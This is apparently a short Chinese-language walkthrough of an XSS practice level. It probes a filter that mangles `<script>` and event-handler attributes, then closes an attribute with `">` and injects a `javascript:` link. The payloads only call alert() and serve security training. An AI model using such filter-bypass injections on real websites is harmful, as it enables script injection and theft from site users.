一、首先先尝试<script>alert(123)</script>
查看源代码:可以看到,他前面有一个引号,并且<script>被改写成<scr_ipt>
结论:
1、可以使用 "> 把前面的语句形成闭合
2、<script>不可以使用
3、前面形成闭合,则后面需要新的标签,所以下一步尝试
<img src=1 οnerrοr=alert(666)>
<svg src=1 οnlοad=alert(666)>
<a href="javascript:alert(1)">
二、尝试"><img src=1 οnerrοr=alert(666)><!-- (<!--是把后面的括号注释,强迫症,不些也没事)
查看源代码可以看到,o后面也会被加入下划线,所以onclick、onmouseover、onerror、onload都无法使用
三、尝试"><a href="javascript:alert(1)">123</a><!--
点击连接通关!!!